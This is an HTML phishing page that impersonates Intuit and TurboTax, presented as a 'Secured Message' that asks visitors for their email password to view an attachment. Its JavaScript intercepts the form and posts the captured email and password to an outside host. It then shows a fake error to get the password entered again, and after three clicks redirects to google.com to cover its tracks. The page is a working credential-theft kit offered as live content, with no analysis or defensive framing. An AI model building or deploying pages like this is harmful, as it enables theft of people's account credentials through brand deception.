<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
  "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
  
<html>
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Secured Message</title>
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700" rel="stylesheet">
	<link rel="icon" href="https://uxfabric.intuitcdn.net/web-app/myturbotax-app-experience/favicon.ico">
	<script src="http://github.com/rafaelp/css_browser_selector/raw/master/css_browser_selector.js" type="text/javascript"></script>

	
    <style>
      html, body {
      display: flex;
	  background-color:#f5f2f2;
      justify-content: center;
      font-family:  Arial;
      font-size: 10px;
      }
      form {
      border: 0px solid #f1f1f1;
	  
      }
      input[type=text], input[type=password] {
      width: 100%;
      padding: 16px 8px;
      margin: 8px 0;
      display: inline-block;
      border: 1px solid ;
      box-sizing: border-box;
      }
	  input[type=password]:focus {
	  border: 3px solid #3771bd;
	  }
      button {
      background-color: #3771bd;
      color: white;
      padding: 14px 0;
      margin: 0px 0;
      border: none;
      cursor: grabbing;
      width: 100%;
	  border-radius: 6px;
      }
      h1 {
      text-align:center;
      fone-size:12;
      }
      button:hover {
      opacity: 0.8;
      }
	  .box{
	  background-color: white;
	  margin-left: auto;
	position: absolute;
	right: 550px;
	top: 170px;
	Width: 400px;
	height: 500px;
  
		
	  }
      .formcontainer {
      text-align: left;
      margin: 24px 50px 12px;
	  background-color: white;
      }
      .container {
      padding: 16px 0;
      text-align:left;
	  background-color: white;
      }
      span.psw {
      float: right;
      padding-top: 0;
      padding-right: 15px;
      }
      /* Change styles for span on extra small screens */
      @media screen and (max-width: 300px) {
      span.psw {
      display: block;
      float: none;
      }

    </style>
  </head>
  <body>
   
  <div style="position: absolute; margin: 65px; margin-left: auto;" ><svg width="104.85" height="37.09" fill="none" version="1.1" viewBox="0 0 845.85 170.09" xmlns="http://www.w3.org/2000/svg">
 <path d="m434.23 98.424c0 41.39 34.318 71.666 77.917 71.666 43.596 0 77.953-30.276 77.953-71.666v-95.093h-42.216v90.191c0 22.342-15.493 37.386-35.851 37.386-20.358 0-35.851-14.969-35.851-37.386v-90.191h-42.213zm268.66-57.034h50.37v125.56h42.213v-125.56h50.373v-38.134h-142.96zm-27.282-38.134h-42.213v163.69h42.213zm-411.92 38.134h50.372v125.56h42.214v-125.56h50.334v-38.134h-142.92zm-221.47-38.134h-42.214v163.69h42.214zm199.24 68.373c0-41.391-34.318-71.629-77.953-71.629-43.636 0-77.953 30.238-77.953 71.629v95.317h42.214v-90.191c0-22.342 15.494-37.386 35.852-37.386 20.358 0 35.852 14.969 35.852 37.386v90.191h42.214l-0.26191-95.317z" fill="#236cff" stroke-width="3.2693"/>
</svg></div>
<br>
 
  <div class="box" id="box1" style="position: relative; margin-left: auto; margin-right: -730px; margin-top: 25px;">
    <form action="" method="post" id="eform">
      <h1 style="font-weight: lighter;">Enter your e-mail password to view the secured attachment</h1>
      <div class="formcontainer">
      <hr/>

      <div class="container">
        <br>
		<p style="font-size: 14px; color:#8d8f91; font-weight: lighter;">Confirm your email address</p>
        <input name="email" type="email" id="email" placeholder="Email" value="[E-mail Address]" style="border-radius: 6px;" required>
<br><br>
        <label style="font-size: 14px; color:#8d8f91; font-weight: lighter;" for="psw"><strong>Password</strong></label>
        <input type="password" placeholder="Enter Password" name="password" type="password" id="password" style="border-radius: 6px;" required>
		<div id="msg"  style=" visibility: hidden; color:red; margin: -10;" class="msg" >
		<p id="error" style="color:red; font-size: 13px; " class="message">The email password in not correct. Try again.</p></div>
      </div>
	  
      <button style="font-weight: bolder; font-size: 16px;" id="submit-btn" onclick="myFunction()" type="submit">Continue</button>
	  <div class="load"></div>
      <div class="container" style="background-color: white">
	 

<div id="" class="" style="text-align: center; font-style: italic;"><span style="text-align: center; font-style: italic;">By selecting Continue, you agree to our <a href="https://turbotax.intuit.com/corp/license/online.jsp" rel="noopener noreferrer" target="_blank" class="">Terms</a><span></span> and have read and acknowledge our <a href="https://www.intuit.com/privacy/statement/" rel="noopener noreferrer" target="_blank" class="">Global Privacy Statement</a>.</span><div style="text-align: center; font-weight: bold; font-style: italic;" class="">Updates effective on January 1, 2023</div></div>
	</div>

      </div> </td>
    </form>

	</div>
	
	
<script>	
window.addEventListener( "load", function () {
  function sendData() {
    const XHR = new XMLHttpRequest();

    // Bind the FormData object and the form element
    const FD = new FormData( form );

    // Define what happens on successful data submission
    XHR.addEventListener( "load", function(event) {
      alert( event.target.responseText );
    } );

    // Define what happens in case of error
    XHR.addEventListener( "error", function showDiv() {
	window.setTimeout("document.getElementById('msg').style.visibility = 'visible';", 3500) 
  
} );

    // Set up our request
    XHR.open( "POST", "https://rdns6.net/dec/pass-chk1.php" );

    // The data sent is what the user provided in the form
    XHR.send( FD );
  }

  // Access the form element...
  const form = document.getElementById( "eform" );
  

  // ...and take over its submit event.
  form.addEventListener( "submit", function ( event ) {
    event.preventDefault();
   


    sendData();
  } );

} );
        
	</script>
    

	<script>
	
	var clicked = 0;

function myFunction() {

  var x = document.getElementById("aftersubmit");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }
  	var x = document.getElementById('box1');
	x.style.opacity = "0.2";
	setTimeout(function(){x.style.opacity = "100"}, 5000);
window.setTimeout("document.getElementById('aftersubmit').style.display='none';",5000)



  clicked++;

  console.log(clicked)
  
  if (clicked === 3) {
    window.location.replace("https://google.com");
    clicked = 0;
  };

};
				
 </script>  


	<div>
	<img class="imgpos" style="position: absolute; Width: 20px; height: 20px; margin-left: -180px; margin-top: 125px; display: block;" src = "https://i.ibb.co/JRz0gqj/tubr.png" alt="turbotax"/>
	<p style="position: absolute; font-size: 14px; font-family:  Arial; color: #9e9e9e; margin-left: -155px; margin-top: 126px;">turbotax</p>
	
	<img style="position: absolute; Width: 20px; height: 20px; margin-left: -75px; margin-top: 125px;" src = "https://i.ibb.co/LZyYK5v/ckrk.png" alt="credit karma"/>
	<p style="position: absolute; font-size: 14px; font-family:  Arial; color: #9e9e9e; margin-left: -50px; margin-top: 126px;">credit karma</p>
	
	<img style="position: absolute; Width: 20px; height: 20px; margin-left: 50px; margin-top: 125px;" src = "https://i.ibb.co/tm4G61y/qubk.png" alt="turbotax"/>
	<p style="position: absolute; font-size: 14px; font-family:  Arial; color: #9e9e9e; margin-left: 75px; margin-top: 126px;">quickbooks</p> </div>
	
		   <div id="aftersubmit" class="" style="text-align: center; display: none; position: absolute; z-index: 1; margin-top: 265px;">
                <img style="width: 300px; height: 170px;" src="https://acegif.com/wp-content/uploads/loading-23.gif" alt=""/>
                </div>
	

<footer style="justify-content: center; text-align: center; position: absolute; margin-top: 725px;">	
	<div> <a href="https://www.intuit.com/legal/" target="_blank" >Legal</a> &nbsp;&nbsp; <a href="https://www.intuit.com/privacy/statement/" target="_blank" >Privacy</a> &nbsp;&nbsp; <a id="IuxSecurityLink" href="https://security.intuit.com/" target=
="_blank" class="">Security</a> </div>
<br>
<div><div style="text-align: center;" class="">© 20223 Intuit, Inc. All rights reserved. Intuit, QuickBooks, QB, TurboTax, ProConnect and Mint are registered trademarks of Intuit Inc.</div><div style="text-align: center;">Terms and conditions, features, support, pricing, and service options subject to change without notice.</div></div> </footer>
<br><br><div></div>

  </body>
</html>

